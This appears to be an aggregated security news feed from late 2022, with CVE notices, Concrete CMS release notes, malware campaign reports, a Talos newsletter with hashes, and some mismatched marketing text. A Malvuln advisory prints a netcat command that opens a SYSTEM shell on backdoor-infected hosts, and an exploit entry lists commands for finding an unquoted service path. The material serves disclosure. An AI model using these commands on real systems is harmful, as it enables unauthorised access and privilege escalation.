The Nintex Workflow plugin 5.2.2.30 for SharePoint allows XSS.

**Join the ranks of 10,000+ organizations that have standardized on Nintex**

 

**Transform the way you work**

Build digital workflows and process apps fast, easily connecting to enterprise systems, while driving results across your organization with Nintex Workflow Cloud, the next generation automation platform.

**Your complete digital transformation toolkit**

Go digital faster with Nintex’s easy-to-use and powerful business process management and intelligent automation software designed to eliminate paper processes and repetitive, manual tasks with clicks, not code.

**Free workflow  
templates & more**

Advance your automation journey with pre-built process maps and workflow and RPA bot templates for use across industries and departments.

 

**Coca-Cola Beverages Florida spurs business growth**

Coke Florida drives operational excellence by leveraging Nintex Workflow Cloud, Nintex RPA and Nintex Promapp®.

**Supported a significant increase in channel business**

Zoom Video Communications replaced its manual order tracking and management process with a digital business solution rapidly built on Nintex Workflow Cloud and integrated with Zendesk and Salesforce.

**Saved $3.5 million and 300,000 hours**

AstraZeneca leveraged the Nintex Process Platform to automate conflict of interest agreements and e-risk assessments allowing its scientists to more quickly research and develop new life-saving drugs.

**Streamlined processes across 450+ e-commerce sites with Nintex K2 Five**

Microsoft manages thousands of content updates and promotions across its global e-commerce sites, reporting 25% time savings per merchandiser and a 30% decrease in production errors.

CVE-2022-38167: Process Management and Workflow Automation Software - Nintex

Concrete CMS is vulnerable to CSRF due to the lack of "State" parameter for external Concrete authentication service for users of Concrete who use the "out of the box" core OAuth.

**8.5.10****Bug Fixes**

*   Fix ZendCacheDriver does not set lifetime properly (thanks hissy)
*   Made the legacy\_salt functionality easier to read

**Developer Updates**

*   Private properties in Select Attribute Controller updated to be protected (thanks biplobice)
*   Added on_get_page_wrapper_class() custom event to allow developers to customize classes delivered by this method (thanks JohnTheFish)

**Security Fixes**

See our security release blog post for more information about security fixes.

**Medium**

*   CVE-2022-43693 Added "state" parameter to OAuth client by default to prevent CSRF. Thanks Bogdan and Adrian Tiron from FORTBRIDGE for reporting.
*   CVE-2022-43692 Sanitized output to prevent XSS in dashboard search pages. Thanks Bogdan and Adrian Tiron from FORTBRIDGE for reporting.
*   CVE-2022-43694 Sanitized output in API endpoint to prevent potential reflected XSS in the Image Manipulation Library. Thanks Bogdan and Adrian Tiron from FORTBRIDGE for reporting.
*   CVE-2022-43967 Sanitized output in multilingual dashboard report to prevent reflected XSS. Thanks Bogdan and Adrian Tiron from FORTBRIDGE for reporting.
*   CVE-2022-43968 Sanitized output on the icons dashboard page to prevent reflected XSS. Thanks Bogdan and Adrian Tiron from FORTBRIDGE for reporting.
*   CVE-2022-43686 Improved performance of "forever" cookie to prevent DOS. Thanks Bogdan and Adrian Tiron from FORTBRIDGE for reporting.
*   CVE-2022-43691 Hide $_SERVER and $_ENV output from whoops by default to prevent information disclosure. Thanks Bogdan and Adrian Tiron from FORTBRIDGE for reporting.
*   CVE-2022-43687 Generate a new session ID when authenticating through OAuth to prevent session fixation. Thanks Bogdan and Adrian Tiron from FORTBRIDGE for reporting.
*   Sanitized dashboard breadcrumbs to prevent stored XSS. Thanks @\_akbar\_jafarli\_for reporting HackerOne report #1696363.

**Low**

*   CVE-2022-43695 Sanitized entity names in entity association dashboard page to prevent stored XSS. Thanks Bogdan and Adrian Tiron from FORTBRIDGE for reporting.
*   CVE-2022-43690 Use strict comparison when testing against legacy password algorithm to prevent against potential integer conversion. Thanks Bogdan and Adrian Tiron from FORTBRIDGE for reporting.
*   CVE-2022-43688 Sanitize Microsoft tile icon to prevent stored XSS. Thanks Bogdan and Adrian Tiron from FORTBRIDGE for reporting.
*   CVE-2022-43689 Disable entity expansion when sanitizing SVGs to prevent DNS based IP disclosure. Thanks Bogdan and Adrian Tiron from FORTBRIDGE for reporting.

**Not Ranked**

*   Added a warning for admins when they are potentially giving more access than they expect when they set certain advanced permissions. Thanks Bogdan and Adrian Tiron from FORTBRIDGE for suggesting.
*   Added a warning when moving groups that permissions of the new parent group will be granted to the child group but the child group will retain all previous permissions.Thanks Bogdan and Adrian Tiron from FORTBRIDGE for suggesting.

CVE-2022-43693: Release 8.5.10 · concretecms/concretecms

Backdoor.Win32.RemServ.d malware suffers from a remote command execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/05a082d441d9cf365749c0e1eb904c85.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.RemServ.dVulnerability: Unauthenticated Remote Command ExecutionFamily: RemServType: PE32MD5: 05a082d441d9cf365749c0e1eb904c85Vuln ID: MVID-2022-0655Disclosure: 11/11/2022Description: The malware creates a service "RSMSS" that runs as SYSTEM and listens on TCP port 26103. Remote attackers who can connect to an infected host will get back a shell as "nt authority\system".Exploit/PoC:C:\>nc64.exe x.x.x.x 26103Microsoft Windows [Version 10.0.16299.309](c) 2017 Microsoft Corporation. All rights reserved.C:\>whoamiwhoamint authority\systemC:\>net usernet userUser accounts for \\----------------------------------------------------------------------------Administrator            DefaultAccount           GuestVictim                   WDAGUtilityAccountThe command completed with one or more errors.Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.RemServ.d MVID-2022-0655 Remote Command Execution

Designation recognizes highest caliber of information security.

**PLEASANTON, Calif., Nov. 14, 2022 /PRNewswire/** — Avatier, the industry leader in identity and access management, today announced it has received ISO 27001:2013 certification for its Information Security Management System (ISMS).

ISO 27001:2013 is an information security standard published by the International Organization for Standardization (ISO), the world's largest developer of voluntary international standards, and the International Electrotechnical Commission (IEC). Avatier's certification was issued by A-LIGN, an independent and accredited certification body based in the United States, on the successful completion of a formal audit process. This certification is evidence that Avatier has met rigorous international standards in ensuring the confidentiality, integrity, and availability of the Avatier Identity Anywhere platform.

Avatier develops identity management and governance platforms that enable organizations to scale faster, innovate quicker and embrace change more securely. Avatier's identity access management (IAM) and identity governance and administration (IGA) solutions do not require client software, so management is in real-time across any platform, such as Google Chrome, Microsoft Teams, or iOS and Android.

"This certification demonstrates Avatier's continued commitment to information security at every level and ensures our customers that the security of their data and information has been addressed, implemented, and properly controlled in all areas of their organization," said Jeremy Russeau, Avatier CISO.

**About Avatier Corporation**

Avatier is the Identity Management company of the future with innovative solutions for today. Avatier develops a "state of the art" identity management platform enabling workforce collaboration resulting in better customer experiences and increased revenue. The company's Identity Anywhere platform uses container technology, providing maximum flexibility, scalability and security in a platform-independent and portable solution that future-proofs your investment. Avatier's identity management and access governance solutions make the world's largest organizations more secure and productive in the shortest time at the lowest costs. Avatier brings all your back-office business applications and employee assets together and manages them as one.

For more information, visit www.avatier.com.

**SOURCE:** Avatier

Avatier Achieves ISO 27001 Certification for its Information Security Management System

A recently discovered cyber espionage group dubbed Worok has been found hiding malware in seemingly innocuous image files, corroborating a crucial link in the threat actor's infection chain.
Czech cybersecurity firm Avast said the purpose of the PNG files is to conceal a payload that's used to facilitate information theft.
"What is noteworthy is data collection from victims' machines using

A recently discovered cyber espionage group dubbed **Worok** has been found hiding malware in seemingly innocuous image files, corroborating a crucial link in the threat actor's infection chain.

Czech cybersecurity firm Avast said the purpose of the PNG files is to conceal a payload that's used to facilitate information theft.

"What is noteworthy is data collection from victims' machines using DropBox repository, as well as attackers using DropBox API for communication with the final stage," the company said.

The development comes a little over two months after ESET disclosed details of attacks carried out by Worok against high-profile companies and local governments located in Asia and Africa. Worok is believed to share tactical overlaps with a Chinese threat actor tracked as TA428.

The Slovak cybersecurity company also documented Worok's compromise sequence, which makes use of a C++-based loader called **CLRLoad** to pave the way for an unknown PowerShell script embedded within PNG images, a technique known as steganography.

That said, the initial attack vector remains unknown as yet, although certain intrusions have entailed the use of ProxyShell vulnerabilities in Microsoft Exchange Server to deploy the malware.

Avast's findings show that the adversarial collective makes use of DLL side-loading upon gaining initial access to execute the CLRLoad malware, but not before performing lateral movement across the infected environment.

PNGLoad, which is launched by CLRLoad (or alternatively another first-stage called PowHeartBeat), is said to come in two variants, each responsible for decoding the malicious code within the image to launch either a PowerShell script or a .NET C#-based payload.

The PowerShell script has continued to be elusive, although the cybersecurity company noted it was able to flag a few PNG files belonging to the second category that dispensed a steganographically embedded C# malware.

"At first glance, the PNG pictures look innocent, like a fluffy cloud," Avast said. "In this specific case, the PNG files are located in C:\\Program Files\\Internet Explorer, so the picture does not attract attention because Internet Explorer has a similar theme."

This new malware, dubbed DropBoxControl, is an information-stealing implant that uses a Dropbox account for command-and-control, enabling the threat actor to upload and download files to specific folders as well as run commands present in a certain file.

Some of the notable commands include the ability to execute arbitrary executables, download and upload data, delete and rename files, capture file information, sniff network communications, and exfiltrate system metadata.

Companies and government institutions in Cambodia, Vietnam, and Mexico are few of the prominent countries affected by DropBoxControl, Avast said, adding the authors of the malware are likely different from those behind CLRLoad and PNGLoad owing to "significantly different code quality of these payloads."

Regardless, the deployment of the third-stage implant as a tool to harvest files of interest clearly indicates the intelligence-gathering objectives of Worok, not to mention serves to illustrate an extension to its killchain.

"The prevalence of Worok's tools in the wild is low, so it can indicate that the toolset is an APT project focusing on high-profile entities in private and public sectors in Asia, Africa, and North America," the researchers concluded.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Worok Hackers Abuse Dropbox API to Exfiltrate Data via Backdoor Hidden in Images

Military veterans tend to have the kind of skills that would make them effective cybersecurity professionals, but making the transition is not that easy.

Organizations are struggling to fill cybersecurity positions. That may be because they aren't utilizing security staff efficiently and so they need more people. It could also just be that the increase in threats means there is more work to be done. For whatever reason, organizations are casting a wider net to find talented and skilled professionals to staff up their security teams, and they are increasingly courting former military personnel.

"The level of training these individuals receive to protect our most critical infrastructure and carry out cyber operations against our adversaries goes far beyond most private sector offerings and is highly transferable to a career in the private sector," Carl Wright, chief commercial officer at AttackIQ, told Dark Reading earlier this year.

As an employee group, veterans exhibit characteristics that make them particularly well-suited for the cybersecurity workforce, the National Institute for Standards and Technology wrote in a special publication (SP1500-16) on helping veterans transition into private IT sector roles. "Their military experience has provided them with years of cybersecurity experience in 'live fire' scenarios, working on systems comparable to those found in the civilian work environment," according to the document. Veterans already possessing security clearances will also be very attractive as job candidates.

They may also have the requisite security certifications. Vendor-neutral certifications are particularly ubiquitous among military personnel, according to the most recent Cybersecurity Workforce Study from (ISC)2.

However, many veterans find making that switch from the military to private sector can be difficult. Veteran-hiring initiatives exist, both inside and outside of industry, but many of these programs are not discovered until too late, NIST said. "Veterans may not find information about these programs, may not see how their military experience translates to job-readiness in the private sector, or may need assistance in gaining certifications necessary to qualify for some private-sector cybersecurity roles," NIST said.

Veterans who did not work in cybersecurity while in the military still have valuable skills that they bring to the field, however. The military emphasizes teamwork, adaptability, and responsibility, all traits that security professionals need to have. Military personnel are also trained in careful decision-making even under extreme pressure using the available information. For example, Josh Smith, a cybersecurity analyst at Nuspire, told Dark Reading earlier this year how the same skills he relied on in the US Navy to ingest data, analyze what was received, disseminate the information to appropriate parties, and take action based on the findings translate to cybersecurity roles.

Earlier this year, the White House National Cyber Workforce and Education Summit issued a call to action to increase cybersecurity education and training opportunities. One of the announcements was to encourage more apprenticeship programs to help develop and train the cybersecurity workforce. In the months since, there have been a number of initiatives from cybersecurity organizations, including SANS Institute.

Many colleges and universities have training programs specifically to give veterans hands-on experience in various areas. Cybersecurity training platform Cybrary said this week it is partnering with VetSec, a community of over 3,300 veterans working in or transitioning into cybersecurity, and TechVets, a bridge service for moving veterans, service leavers, reservists, and their families into IT careers.

Private companies are partnering with veterans' organizations as well. For example, consulting giant Accenture offers a military veteran technology program, as does networking titan Cisco. Microsoft Software and Systems Academy (MSSA) was created to provide transitioning service members and veterans with career skills needed in the modern tech industry. Arctic Wolf, for example, works with the Department of Defense's SkillBridge program to provide a path to reentry into the workforce for those leaving the military.

Such efforts seem to be paying off. According to the US Department of Labor, unemployment among veterans is running nearly a full percentage point below the general population; in October 2022, only 2.7% of veterans were unemployed, compared to 3.6% overall.

Why Cybersecurity Should Highlight Veteran-Hiring Programs

IOTransfer version 4 suffers from an unquoted service path vulnerability.

    # Exploit Title: IOTransfer V4 - Unquoted Service Path# Exploit Author: BLAY ABU SAFIAN (Inveteck Global)# Discovery Date: 2022-28-07# Vendor Homepage: http://www.iobit.com/en/index.php# Software Link: https://iotransfer.itopvpn.com/download/# Tested Version: V4# Vulnerability Type: Unquoted Service Path# Tested on OS: Microsoft Windows Server 2019 Standard Evaluation CVE-2022-37197# Step to discover Unquoted Service Path:C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """IOTransfer Updater IOTUpdaterSvc C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exe                      AutoC:\>sc qc IOTUpdaterSvc[SC] QueryServiceConfig SUCCESSSERVICE_NAME: IOTUpdaterSvc        TYPE : 10 WIN32_OWN_PROCESS        START_TYPE : 2 AUTO_START        ERROR_CONTROL : 1 NORMAL        BINARY_PATH_NAME : C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exeLOAD_ORDER_GROUP :        TAG : 0        DISPLAY_NAME : IOTransfer Updater        DEPENDENCIES :        SERVICE_START_NAME : LocalSystemC:\>systeminfoOS Name: Microsoft Windows Server 2019 Standard EvaluationOS Version: 10.0.17763 N/A Build 17763OS Manufacturer: Microsoft Corporation

IOTransfer 4 Unquoted Service Path

Microsoft on Thursday attributed the recent spate of ransomware incidents targeting transportation and logistics sectors in Ukraine and Poland to a threat cluster that shares overlaps with the Russian state-sponsored Sandworm group.
The attacks, which were disclosed by the tech giant last month, involved a strain of previously undocumented malware called Prestige and is said to have taken place

Microsoft on Thursday attributed the recent spate of ransomware incidents targeting transportation and logistics sectors in Ukraine and Poland to a threat cluster that shares overlaps with the Russian state-sponsored Sandworm group.

The attacks, which were disclosed by the tech giant last month, involved a strain of previously undocumented malware called Prestige and is said to have taken place within an hour of each other across all victims.

The Microsoft Threat Intelligence Center (MSTIC) is now tracking the threat actor under its element-themed moniker Iridium (née DEV-0960), citing overlaps with Sandworm (aka Iron Viking, TeleBots, and Voodoo Bear).

"This attribution assessment is based on forensic artifacts, as well as overlaps in victimology, tradecraft, capabilities, and infrastructure, with known Iridium activity," MSTIC said in an update.

The company also further assessed the group to have orchestrated compromise activity targeting many of the Prestige victims as far back as March 2022, before culminating in the deployment of the ransomware on October 11.

The method of initial compromise still remains unknown, although it's suspected that it involved gaining access to highly privileged credentials necessary to activate the killchain.

"The Prestige campaign may highlight a measured shift in Iridium's destructive attack calculus, signaling increased risk to organizations directly supplying or transporting humanitarian or military assistance to Ukraine," the company said.

The findings come over a month after Recorded Future linked another activity group (UAC-0113) with ties to the Sandworm actor as having singled out Ukrainian users by masquerading as telecom providers in the country to deliver backdoors onto compromised machines.

Microsoft, in its Digital Defense Report published last week, further called out Iridium for its pattern of targeting critical infrastructure and operational technology entities.

"Iridium deployed the Industroyer2 malware in a failed effort to leave millions of people in Ukraine without power," Redmond said, adding the threat actor used "phishing campaigns to gain initial access to desired accounts and networks in organizations within and outside Ukraine."

The development also arrives amid sustained ransomware attacks aimed at industrial organizations worldwide during the third quarter of 2022, with Dragos reporting 128 such incidents during the time period compared to 125 in the previous quarter.

"The LockBit ransomware family account for 33% and 35% respectively of the total ransomware incidents that target industrial organizations and infrastructures in the last two quarters, as the groups added new capabilities in their new LockBit 3.0 strain," the industrial security firm said.

Other prominent strains observed in Q3 2022 include Cl0p, MedusaLocker, Sparta, BianLian, Donuts, Onyx, REvil, and Yanluowang.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Blames Russian Hackers for Prestige Ransomware Attacks on Ukraine and Poland

By Deeba Ahmed
Dubbed StrelaStealer, the malware is being distributed through malicious email attachments and targets Spanish-speaking people.
This is a post from HackRead.com Read the original post: StrelaStealer Malware Hijacking Outlook and Thunderbird Accounts

The cyber security researchers at DCSO CyTec have discovered a brand-new information-stealing malware targeting Outlook and Thunderbird emails.

Dubbed StrelaStealer, the malware acts just like any other info stealer and tries to steal data from browsers, cloud gaming apps, cryptocurrency wallet apps, the clipboard, and other sources. However, what’s unique about this campaign is that the malware steals data from Thunderbird and Outlook accounts and targets Spanish-speaking people.

**Attack Chain Analysis**

The malware was detected earlier this month. The attack chain involves sending email attachments to the targeted user. These attachments contain ISO files. When a user clicks on the file, it opens an executable (msinfo32.exe). It then sideloads the bundled malware through DLL order hijacking.

The malicious email used in the campaign

In some cases, the ISO contains a .lnk file (Factura.Ink) and an HTML document that’s a polyglot file (x.html). Such as, when you open an HTML file on a web browser, you will see a text document, and when it is opened via an executable, it installs the payload.

1.  VirusTotal Reveals Apps Most Exploited to Spread Malware
2.  Urlscan.io API Inadvertently Leaked Sensitive Data and URLs
3.  Microsoft Office Most Exploited Software in Malware Attacks
4.  Apple Safari Safest, Google Chrome Riskiest Browser of 2022
5.  Top 10 Android Educational Apps That Collect Most User Data

**How does the Attack Works?**

When the user clicks on the .lnk file, it executes the x.html twice. First, it executes it using rundll32.exe and opens the embedded StrelaStealer DLL. Then it opens the HTML file in the device’s default browser to reveal a decoy document.

While the user is busy checking this document, the info stealer starts its malicious tasks in the background. Such as, it searches for login.json and key4.db in %APPDATA%\\Thunderbird\\Profiles\\ directory for stealing account credentials.

In Outlook’s case, the malware accesses the Windows Registry and steals the software’s key, after which it inspects the IMAP User, IMAP Password, and IMAP Server values. If found, the malware exfiltrates the content to a C2 server controlled by the attacker.

Then it waits for the attacker’s response. If received, the malware quits. If not, it repeats the routine after a 1-second sleep session.

In conclusion, email attachments can be a great way to share information and files with others, but they can also be a source of malware. By following some simple guidelines, you can protect yourself from malicious email attachments.

First, never open an attachment from someone you don’t know. If you’re not expecting an attachment from the sender, be wary of opening it. Second, always scan attachments for viruses before opening them. Many email programs will do this automatically, but if yours doesn’t, there are many free virus scanners available online.

Finally, make sure you have an updated security solution installed on your system. One can also use VirusTotal to scan malicious files and URLs.

StrelaStealer Malware Hijacking Outlook and Thunderbird Accounts

Welcome to this week’s edition of the Threat Source newsletter.
Tuesday was an absolute hammer for the infosec community. Not only did we have the US elections but we had Emotet returning and a regular Microsoft Tuesday release. That release always leads me to think about the bug

Thursday, November 10, 2022 16:11

Welcome to this week’s edition of the Threat Source newsletter.

Tuesday was an absolute hammer for the infosec community. Not only did we have the US elections but we had Emotet returning and a regular Microsoft Tuesday release. That release always leads me to think about the bug hunting ecosystem and the importance and value of vulnerability research. I admit that the phrase bug hunting ecosystem does lead you to think of the magical days in school. A tv rolled in the classroom on the big AV cart to show a documentary - the salad days. We were masters of our domain. Enough oldguy rambling, vulnerability research is absolutely vital to the security of the internet. Researchers dig into software and operating systems, identifying vulnerabilities in order to discover them before malicious threat actors do. A discovered and responsibly disclosed vulnerability can nullify possibly disastrous public exploitation before the attackers ever get their campaigns off the ground. It may also be before the threat actors have found the vulnerability at all. Ensuring that the vendor can create patches or remediation before attackers can leverage the vulnerability in the wild is a massive win for defenders, but it's often not discussed widely. So this is me saying "thank you so much" to those researchers that are undertaking the arduous process of identifying vulnerabilities and coordinating disclosure with the vendors

**The one big thing**

Emotet is back. Did it ever truly go away? Emotet has been disrupted by law enforcement only to return over and over again. Tracking Emotet as it evolved from banking trojan to modular botnet has been interesting. To me it’s not unlike the Whac-A-Mole adventure that was Talos v. Angler as they developed and implemented new techniques to not only exploit end users but attempt to avoid detection.

**Why do I care?**

Emotet has been very successful for a very long time and it’s likely that if you are reading this you are already aware of Emotet and may have had to deal with them firsthand. History shows us that they aren’t going away so being aware of the active research from Talos is vital in attempting to stay secure.

**So now what?**

Same as it ever was. Ensure that end users are educated as much as possible but understand that they will click the link. You need to verify that all security devices are up to date with the latest coverage releases, and that you follow the Talos blog where you will always find IOCs in clear text or appended via the Talos GitHub. Make sure you have implemented a strong patch management keeping systems up to date, as well as performing general system hardening that includes removing services or protocols that are unnecessary.

**Top security headlines from the week**

More than two dozen Lenovo notebook models are vulnerable to exploitation that disables the UEFI secure-boot process. Once exploited unsigned UEFI apps or load bootloaders can be run that permanently backdoor the device. Researchers from ESET disclosed the vulnerabilities as Lenovo released security updates for 25 vulnerable models. Vulnerabilities that undermine the UEFI secure boot make it possible for attackers to install malicious firmware that survives multiple operating system re-installations and avoids detection. (Ars Technica)

Zimperium zLabs recently identified a malicious extension that lets attackers control Google Chrome remotely. Cloud9, a malicious browser extension, is not only capable of stealing the information from a browser session, it can also install malware on a user’s device and subsequently assume control of the entire device, effectively a remote access trojan (RAT) for the Chromium web browser (Google Chrome and Microsoft Edge for example). The extension was not available on the official Chrome store but instead delivered via websites pushing fake Adobe Flash Player updates. (Bleepingcomputer)

**Can’t get enough Talos?**

*   Emotet coming in hot
*   Threat Spotlight: Cyber Criminal Adoption of IPFS for Phishing, Malware Campaigns
*   Microsoft Patch Tuesday for November 2022 — Snort rules and prominent vulnerabilities
*   The Company You Keep – Preparing for supply chain attacks with Talos IR

**Upcoming events where you can find Talos**

BSides Lisbon (Nov. 10 - 11)  
Cidade Universitária, Lisboa, Portugal

SIS(Security Intelligence Summit), 2022.ON (Nov. 29)  
Josun Palace, Seoul

CactusCon (Jan 27-28)  
Mesa, AZ

**Most prevalent malware files from Talos telemetry over the past week**

SHA 256:  
9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
Typical Filename: VID001.exe  
Detection Name: Simple\_Custom\_Detection

SHA25  
1077bff9128cc44f98379e81bd1641e5fbaa81fc9f095b89c10e4d1d2c89274d  
MD5: 26f927fb7560c11e509f0b8a7e787f79  
Typical Filename: Iris QuickLinks.exe  
Detection Name: W32.DFC.MalParent

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
MD5: 7bdbd180c081fa63ca94f9c22c457376  
Typical Filename: IMG001.exe  
Detection Name: Simple\_Custom\_Detection

SHA 256:  
e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

Tag

#microsoft